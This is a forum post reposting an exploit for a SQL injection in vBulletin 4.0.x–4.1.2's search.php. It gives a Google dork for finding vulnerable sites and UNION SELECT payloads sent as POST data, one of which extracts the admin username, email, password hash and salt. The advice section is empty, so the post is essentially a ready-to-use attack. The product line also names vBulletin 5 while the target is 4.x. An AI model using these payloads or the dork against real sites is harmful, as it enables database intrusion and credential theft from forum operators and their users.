| SoLiTair4Ever | 01-24-2013 09:52 PM |
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
ßæÏ:
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
================================================== ==================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
================================================== ==================
#[+] Discovered By : D4rkB1t
Product: vBulletin 5 Connect, The World's Leading Community Software
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
--------------------------
# ~Advice~ #
--------------------------
| 